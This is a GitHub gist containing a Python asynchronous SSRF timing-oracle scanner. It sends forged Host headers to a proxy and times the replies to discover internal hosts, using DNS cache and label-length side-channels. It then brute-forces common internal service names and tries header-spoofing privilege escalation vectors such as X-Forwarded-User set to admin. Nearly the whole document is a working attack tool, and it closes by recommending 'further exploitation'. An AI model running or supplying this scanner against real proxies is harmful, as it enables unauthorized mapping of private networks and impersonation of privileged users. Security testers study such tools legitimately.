Skip to content

Instantly share code, notes, and snippets.

@ncouture
Created May 14, 2026 17:55
Show Gist options
  • Select an option

  • Save ncouture/6fc1f552fa2bdea0614ada98f42cf16a to your computer and use it in GitHub Desktop.

Select an option

Save ncouture/6fc1f552fa2bdea0614ada98f42cf16a to your computer and use it in GitHub Desktop.
import sys
import time
import asyncio
import argparse
import aiohttp
from typing import Dict, Tuple, Optional, List
# Scoped SSRF timing fuzzer
class ScopedSsrfTimingFuzzer:
"""
Real-world asynchronous SSRF timing oracle fuzzer.
Targets proxies/reverse proxies vulnerable to scoped SSRF via:
- DNS cache side-channel (cache hit vs miss timing)
- DNS label length validation side-channel
"""
def __init__(self, target_url: str, timeout: float = 10.0, verify_ssl: bool = True):
self.target_url = target_url.rstrip("/")
self.timeout = aiohttp.ClientTimeout(total=timeout)
self.verify_ssl = verify_ssl
self.session: Optional[aiohttp.ClientSession] = None
self.base_latency: Optional[float] = None
async def __aenter__(self):
self.session = aiohttp.ClientSession(
timeout=self.timeout, connector=aiohttp.TCPConnector(ssl=self.verify_ssl)
)
return self
async def __aexit__(self, exc_type, exc_val, exc_tb):
if self.session:
await self.session.close()
async def _measure_request(
self, host: str, extra_headers: Optional[Dict[str, str]] = None
) -> Tuple[int, Dict[str, str], float]:
"""Send a single probe and return (status, headers, duration)"""
start = time.perf_counter()
headers = {
"Host": host,
"User-Agent": "Mozilla/5.0 (compatible; SSRF-Scanner)",
}
if extra_headers:
headers.update(extra_headers)
try:
async with self.session.get(
self.target_url, headers=headers, allow_redirects=False, ssl=self.verify_ssl
) as resp:
duration = time.perf_counter() - start
return resp.status, dict(resp.headers), duration
except asyncio.TimeoutError:
duration = time.perf_counter() - start
return 0, {"X-Error": "Timeout"}, duration
except Exception as e:
duration = time.perf_counter() - start
return 0, {"X-Error": str(e)[:100]}, duration
async def calibrate_baseline(self, samples: int = 5) -> float:
"""Calibrate baseline latency using an obviously out-of-scope domain"""
print("[*] Calibrating baseline latency...")
total = 0.0
for _ in range(samples):
_, _, dur = await self._measure_request("nonexistent-external-domain-1234567890.com")
total += dur
self.base_latency = total / samples
print(f"[+] Baseline latency: {self.base_latency * 1000:.2f}ms")
return self.base_latency
async def analyze_label_length_oracle(self, scope_suffix: str = ".internal.corp") -> bool:
"""
DNS Label Length Oracle (RFC 1035: max 63 octets per label)
A valid 63-char label is processed differently than a 64-char one
if the proxy performs DNS resolution before length validation.
"""
valid_label = "a" * 63 + scope_suffix
invalid_label = "a" * 64 + scope_suffix
t_valid = (await self._measure_request(valid_label))[2]
t_invalid = (await self._measure_request(invalid_label))[2]
delta = t_valid - t_invalid
active_processing = delta > 0.025 # Threshold tunable per environment
print(
f"[Label Oracle] Scope: *{scope_suffix:<35} | "
f"L63: {t_valid * 1000:6.2f}ms | L64: {t_invalid * 1000:6.2f}ms | "
f"Δ: {delta * 1000:5.2f}ms | Active: {active_processing}"
)
return active_processing
async def analyze_dns_cache_oracle(self, target_host: str, retries: int = 2) -> bool:
"""
DNS Cache Hit Oracle.
First request → potential cache miss (full resolution).
Second request → cache hit if the domain was resolved internally.
"""
deltas = []
for i in range(retries):
# Probe 1
t1 = (await self._measure_request(target_host))[2]
# Probe 2 immediately after
t2 = (await self._measure_request(target_host))[2]
delta = t1 - t2
deltas.append(delta)
print(
f"[Cache Oracle] {target_host:<45} | P1: {t1 * 1000:6.2f}ms | "
f"P2: {t2 * 1000:6.2f}ms | Δ: {delta * 1000:5.2f}ms"
)
avg_delta = sum(deltas) / len(deltas)
is_likely_internal = avg_delta > 0.028 # Adjust threshold based on calibration
if is_likely_internal:
print(f"[+] POTENTIAL INTERNAL HOST: {target_host}")
return is_likely_internal
async def brute_force_internal_hosts(
self, wordlist: List[str], scope_suffix: str = ".fictional-enterprise.local"
):
"""Brute force common internal hostnames"""
print(f"\n[*] Starting brute-force on {len(wordlist)} candidates...")
discovered = []
for host in wordlist:
if not host.endswith(scope_suffix):
host = (
host + scope_suffix
if not host.endswith(".")
else host.rstrip(".") + scope_suffix
)
vulnerable = await self.analyze_dns_cache_oracle(host)
if vulnerable:
discovered.append(host)
return discovered
async def test_privilege_impersonation(self, target_host: str):
"""Test common header-based privilege escalation vectors"""
print(f"\n[*] Testing impersonation vectors on {target_host}")
vectors = [
{"X-Forwarded-User": "admin", "X-Forwarded-For": "127.0.0.1"},
{"X-Forwarded-User": "system-admin", "X-Original-User": "root"},
{"X-Forwarded-For": "::1", "X-Real-IP": "10.0.0.1"},
{"X-Forwarded-User": "administrator", "X-Authenticated-User": "admin"},
]
base_status, base_headers, _ = await self._measure_request(target_host)
print(
f" Base access → {base_status} | {base_headers.get('X-Privilege-Level', 'None')}"
)
for headers in vectors:
status, resp_headers, _ = await self._measure_request(target_host, headers)
priv = resp_headers.get("X-Privilege-Level") or resp_headers.get("X-Role") or "None"
print(f" + Headers {list(headers.keys())} → {status} | Privilege: {priv}")
async def main():
parser = argparse.ArgumentParser(description="Scoped SSRF Timing Oracle Scanner")
parser.add_argument("target", help="Target URL (e.g. http://proxy.internal:8080/endpoint)")
parser.add_argument("--wordlist", help="Path to subdomain wordlist", default=None)
parser.add_argument("--scope", default=".internal.corp", help="Internal domain suffix")
parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification")
args = parser.parse_args()
print("[*] Real-World Scoped SSRF Timing Oracle Framework")
print(f"[+] Target: {args.target}\n")
async with ScopedSsrfTimingFuzzer(args.target, verify_ssl=not args.no_ssl_verify) as fuzzer:
await fuzzer.calibrate_baseline()
print("\n" + "=" * 80)
print("PHASE 1: SCOPE DETECTION (Label Length Oracle)")
print("=" * 80)
await fuzzer.analyze_label_length_oracle(args.scope)
await fuzzer.analyze_label_length_oracle(".external-attackers.com") # negative control
print("\n" + "=" * 80)
print("PHASE 2: INTERNAL HOST DISCOVERY (DNS Cache Oracle)")
print("=" * 80)
# Default wordlist for demonstration / common internal names
default_candidates = [
"admin",
"api",
"internal",
"staging",
"dev",
"prod",
"core",
"auth",
"login",
"db",
"database",
"ldap",
"jenkins",
"gitlab",
"confluence",
"jira",
"grafana",
"prometheus",
"kubernetes",
"etcd",
]
wordlist = default_candidates
if args.wordlist:
try:
with open(args.wordlist) as f:
wordlist = [
line.strip() for line in f if line.strip() and not line.startswith("#")
]
print(f"[+] Loaded {len(wordlist)} entries from wordlist")
except Exception as e:
print(f"[-] Failed to load wordlist: {e}")
discovered = await fuzzer.brute_force_internal_hosts(wordlist, args.scope)
print("\n" + "=" * 80)
print("PHASE 3: PRIVILEGE ESCALATION TESTING")
print("=" * 80)
for host in discovered[:3]: # Test top discovered hosts
await fuzzer.test_privilege_impersonation(host)
if discovered:
print(f"\n[+] Discovered internal hosts: {discovered}")
print("[!] Manual verification and further exploitation recommended.")
if __name__ == "__main__":
asyncio.run(main())
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment